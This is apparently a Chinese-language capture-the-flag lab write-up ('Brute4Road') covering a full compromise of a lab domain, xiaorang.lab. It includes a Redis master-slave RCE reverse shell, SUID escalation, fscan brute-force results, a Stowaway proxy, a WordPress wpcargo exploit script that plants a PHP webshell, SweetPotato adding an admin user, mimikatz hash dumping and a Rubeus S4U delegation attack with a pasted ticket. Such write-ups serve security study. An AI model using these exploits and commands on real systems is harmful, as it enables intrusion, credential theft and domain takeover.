Brute4Road redis主从复制拿shell fscan扫描,6379端口开放,尝试redis漏洞,发现主从复制rce(https://github.com/n0b0dyCN/redis-rogue-server)可以利用,主从复制原理:主机负责写,从机负责读,实现读写分流
redis系列漏洞参考文章:https://www.freebuf.com/articles/web/249238.html
输入r,反向shell
此时vps再监听其他端口接受反弹的shell,弹出来shell之后创建一个伪终端
1 python -c 'import pty; pty.spawn("/bin/bash")'
/home/redis看到flag
cat flag发现权限不够
提权 suid提权探针
find / -user root -perm -4000 -print 2>/dev/null
这里用base64
1 base64 "/home/redis/flag/flag01" | base64 --decode
看到内网网段
wget 下载fscan,扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 ./fscan -h 172.22.2.0/24 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │ └──────────────────────────────────────────────┘ Fscan Version: 2.0.0 [2025-03-04 21:17:06] [INFO] 暴力破解线程数: 1 [2025-03-04 21:17:06] [INFO] 开始信息扫描 [2025-03-04 21:17:06] [INFO] CIDR范围: 172.22.2.0-172.22.2.255 [2025-03-04 21:17:06] [INFO] 生成IP范围: 172.22.2.0.%!d(string=172.22.2.255) - %!s(MISSING).%!d(MISSING) [2025-03-04 21:17:06] [INFO] 解析CIDR 172.22.2.0/24 -> IP范围 172.22.2.0-172.22.2.255 [2025-03-04 21:17:06] [INFO] 最终有效主机数量: 256 [2025-03-04 21:17:06] [INFO] 开始主机扫描 [2025-03-04 21:17:06] [INFO] 正在尝试无监听ICMP探测... [2025-03-04 21:17:06] [INFO] 当前用户权限不足,无法发送ICMP包 [2025-03-04 21:17:06] [INFO] 切换为PING方式探测... [2025-03-04 21:17:06] [SUCCESS] 目标 172.22.2.3 存活 (ICMP) [2025-03-04 21:17:06] [SUCCESS] 目标 172.22.2.7 存活 (ICMP) [2025-03-04 21:17:06] [SUCCESS] 目标 172.22.2.16 存活 (ICMP) [2025-03-04 21:17:07] [SUCCESS] 目标 172.22.2.18 存活 (ICMP) [2025-03-04 21:17:07] [SUCCESS] 目标 172.22.2.34 存活 (ICMP) [2025-03-04 21:17:12] [INFO] 存活主机数量: 5 [2025-03-04 21:17:12] [INFO] 有效端口数量: 233 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.18:80 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:80 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.18:22 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.7:80 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.7:22 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.7:21 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.3:135 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.34:135 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.3:139 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:135 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.18:445 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.34:139 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.34:445 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:445 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.18:139 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.3:389 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.3:445 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:139 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.3:88 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.16:1433 [2025-03-04 21:17:13] [SUCCESS] 端口开放 172.22.2.7:6379 [2025-03-04 21:17:13] [SUCCESS] 服务识别 172.22.2.18:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.] [2025-03-04 21:17:13] [SUCCESS] 服务识别 172.22.2.7:22 => [ssh] 版本:7.4 产品:OpenSSH 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.4.] [2025-03-04 21:17:13] [SUCCESS] 服务识别 172.22.2.7:21 => [ftp] 版本:3.0.2 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.2).] [2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.16:80 => [http] 版本:2.0 产品:Microsoft HTTPAPI httpd 系统:Windows [2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.7:80 => [http] 版本:1.20.1 产品:nginx [2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.3:139 => Banner:[.] [2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.34:139 => Banner:[.] [2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.34:445 => [2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.16:445 => [2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.3:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name [2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.3:445 => [2025-03-04 21:17:18] [SUCCESS] 服务识别 172.22.2.16:139 => Banner:[.] [2025-03-04 21:17:19] [SUCCESS] 服务识别 172.22.2.3:88 => [2025-03-04 21:17:19] [SUCCESS] 服务识别 172.22.2.16:1433 => [ms-sql-s] 版本:13.00.4001; SP1 产品:Microsoft SQL Server 2016 系统:Windows Banner:[.%.] [2025-03-04 21:17:20] [SUCCESS] 服务识别 172.22.2.18:80 => [http] [2025-03-04 21:18:13] [SUCCESS] 服务识别 172.22.2.18:445 => [2025-03-04 21:18:13] [SUCCESS] 服务识别 172.22.2.18:139 => [2025-03-04 21:18:14] [SUCCESS] 服务识别 172.22.2.7:6379 => [2025-03-04 21:18:18] [SUCCESS] 服务识别 172.22.2.3:135 => [2025-03-04 21:18:18] [SUCCESS] 服务识别 172.22.2.34:135 => [2025-03-04 21:18:18] [SUCCESS] 服务识别 172.22.2.16:135 => [2025-03-04 21:18:18] [INFO] 存活端口数量: 21 [2025-03-04 21:18:18] [INFO] 开始漏洞扫描 [2025-03-04 21:18:18] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, mssql, netbios, redis, smb, smb2, smbghost, ssh, webpoc, webtitle [2025-03-04 21:18:18] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.2.16 主机名: MSSQLSERVER 发现的网络接口: IPv4地址: └─ 172.22.2.16 [2025-03-04 21:18:18] [SUCCESS] 网站标题 http://172.22.2.7 状态码:200 长度:4833 标题:Welcome to CentOS [2025-03-04 21:18:18] [SUCCESS] 网站标题 http://172.22.2.16 状态码:404 长度:315 标题:Not Found [2025-03-04 21:18:18] [SUCCESS] NetBios 172.22.2.34 XIAORANG\CLIENT01 [2025-03-04 21:18:18] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.2.34 主机名: CLIENT01 发现的网络接口: IPv4地址: └─ 172.22.2.34 [2025-03-04 21:18:18] [INFO] 系统信息 172.22.2.3 [Windows Server 2016 Datacenter 14393] [2025-03-04 21:18:18] [INFO] 系统信息 172.22.2.16 [Windows Server 2016 Datacenter 14393] [2025-03-04 21:18:18] [SUCCESS] NetBios 172.22.2.3 DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393 [2025-03-04 21:18:18] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.2.3 主机名: DC 发现的网络接口: IPv4地址: └─ 172.22.2.3 [2025-03-04 21:18:18] [SUCCESS] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393 [2025-03-04 21:18:18] [SUCCESS] 匿名登录成功! [2025-03-04 21:18:18] [SUCCESS] NetBios 172.22.2.18 WORKGROUP\UBUNTU-WEB02 [2025-03-04 21:18:18] [SUCCESS] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable [2025-03-04 21:18:18] [SUCCESS] SMB认证成功 172.22.2.18:445 administrator:123456 [2025-03-04 21:18:18] [INFO] SMB2共享信息 172.22.2.18:445 administrator Pass:123456 共享:[print$ IPC$] [2025-03-04 21:18:18] [SUCCESS] 网站标题 http://172.22.2.18 状态码:200 长度:57738 标题:又一个WordPress站点 [2025-03-04 21:18:20] [INFO] SMB2共享信息 172.22.2.16:445 admin Pass:123456 共享:[ADMIN$ C$ fileshare IPC$] [2025-03-04 21:18:26] [SUCCESS] SMB认证成功 172.22.2.16:445 admin:123456
stowaway代理搭建
vps:
./linux_x64_admin –heartbeat -l 61032 -s aab32
在被控端(shell机器)启动:
./linux_x64_agent -c <VPS IP地址>:61032 -s aab32
建立连接后,在服务端选中上线的节点,并且执行socks命令即可。
1 2 3 use 0 # socks 端口 用户名 密码 socks 55667 username password
此时使用 socks5://username:password@<VPS IP>:55667 就可以代理到被控端的内网了。
尝试使用账号密码时不能用,去掉账号密码可以
1 proxychains wpscan --url http://172.22.2.18
在网上查到相关rce文章,并且给了利用脚本
https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import sys import binascii import requests # This is a magic string that when treated as pixels and compressed using the png # algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50' def encode_character_code(c: int): return '{:08b}'.format(c).replace('0', 'x') text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:] destination_url = 'http://172.22.2.18/' cmd = 'ls' # With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels. requests.get( f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php" ) # We have uploaded a webshell - now let's use it to execute a command. print(requests.post( f"{destination_url}webshell.php?1=system", data={"2": cmd} ).content.decode('ascii', 'ignore'))
一把梭哈
连接蚁剑
注意到config文件,查看,得到数据库用户,密码。
看到数据库密码
连一下
爆破 发现了一个密码表,导出
再回到之前的fscan扫描结果,还有1433端口开放去爆破,用那个密码爆破172.22.2.16:1433。
fscan -h 172.22.2.16 -m mssql -pwdf 1.txt [+] mssql:172.22.2.16:1433:sa ElGNkOiC
这里环境出了点问题使用pwncat,收到shell之后会进入到pwncat终端模式这时候想要回到shell模式只需输入back
上mdut
Sweetpotato提权
1 2 C:/Users/Public/SweetPotato-Webshell-new.exe -a "net user test qwer1234! /add" C:/Users/Public/SweetPotato-Webshell-new.exe -a "net localgroup administrators test /add"
rdp上去
在用户位置翻到flag
域渗透 发现在域内,上传猕猴桃抓取hash,管理员运行
1 2 privilege::debug sekurlsa::logonpasswords
这里用Adinfo(https://github.com/lzzbb/Adinfo/releases )
1 .\Adinfo_win.exe -d xiaorang.lab --dc 172.22.2.3 -u MSSQLSERVER$ -H 26c5767767ddac88dfccd8449fc11502
发现约束委派
1 .\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:26c5767767ddac88dfccd8449fc11502 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
之后注入票据
1 .\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE35FWG/jPPvxUw/lHeSjZgWtlqb2wYxA+JK8guQVinSocTPiJxmyzJx4QmWVBa2kXo0gizhWCEYNjrSdWhMJ5I8vzw+e8Bft3i5m5svPbcyImYWhDlg7Mvysh0fAekboYFgUWklHkA0OvwPyd9pA8K9e9mNzq2SyxHmkNxWtmX0tgPAZXnowM3DKT9Uewdl0zfHeqCfRqGErml+IxkQmgyllrnxluhlDcU+yjETECmnUX2AUGd9DivoCw2Nk6iTRlc09pCYtU2gVjrte4knoZRw8cmpn5bPnYzXkMBdedYngf0ihW0xo+kKh6XzWuTC1Q4EtTWHQmr/oWzuNfmh0ldOJVx0BarDogz8NCmYIo81zGp9XUYjeajFOC3qRsLGsMwQg0m0CdoX24dRS5haMtTbNVsXt+y1Fk2Q0bykJPN1/U2vol0i2jVGPXJcDsrz5JmFOAWswAQ1pjz/FoPh6/be/0MY2p5tJwmXc7BTSeDLvJAcK5YnbeQZ9KNlLIEB3oECXjdkIq992blr6Nn0+ReEHWQkCreUPjHgTLu69qURQrzOruUZlrV+LusdGptZVg/HCP74aKleqTBp35sT/zyCL+GgqkFq0FLelQxebb8lbbreysa1GG8IivGROl2bqb4w9AqDuoCQTXa87F22nQ24d9ZL1U5STQWKL5d5T0TivwXyRqGNHcveSJfYN17fiwTVhxb5og/F17BLClvid+zDmXe4iZ6oyXgefSXAv35WekdhrywWm3DED3qd7V5WBo1Zd5JRojuZbg0+thmC/gCJcQtoU8xpiIqP/2fKA2NlKQYf5BjhXlbOri/Yq+TRRZVQQUgQS58dYfi9hLNgE5nzlnfmCY49uXCe3WbzoNFVPconnjRJUh9PP+QOk+0l2mLsUKeaQaFldlB8PbAh7nhPPJVycjOACBMNDFUr90VF9WgHnijxvFDkp3XHktauL4EaInkxPg7QSsk0pVCowVrdRRwkPyPVW38/3MwA5/j7Jg7yeice+gV3UcrvRbRChb1fJZcyHcC4BSo9U+iKJtBs1Zcm3DqTQVas4f9qc9eKtQJze+icr+lbMsQwJYk9ZUSOTBueg8eVWGnSwMACaMAjUjkUYYyh36oZMRPb24zr4weUIxGsixxUbLdtnszq8givNuxCXX2ES53L72XxkKuGULblnqL0Yf5O7Hwr2fIkbwRJjnweAd7c/IcT/4uyhnp8VhabIgv9N5UdlTgfCyGyfZVxEhxxPd88ma/QNXsiicnHX/QQ0g8AYLA3175X/n/pBNZZkALWo7PoSc/BB+Xbq3gSrDgMpxaywGu9Gnz/Q1vyk9txVO6WN7x7ivu+3s/z17CwRkjF0LNzoZ4/+JUwQSXesdKTcCdLC0fNodwl0HF2Dkv4nCwvaPh+Xac0i/TpXMQJho6dyphE19l6hXJTTaLolWYQEgkIKgDQlFuCdTKXPkygJxv/G5ED3dGjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBBlCcnhKBNudgBbGrCE1V9ZoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDMwNTEyMDIyMVqmERgPMjAyNTAzMDUyMjAyMjFapxEYDzIwMjUwMzEyMTIwMjIxWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==
之后再访问域控里面的flag文件
参考:https://forum.butian.net/share/1591
MSSQLSERVER 配置了到域控的约束委派, 可以通过 S4U 伪造高权限 ST 拿下域控,用Rubeus申请访问自身的服务票据
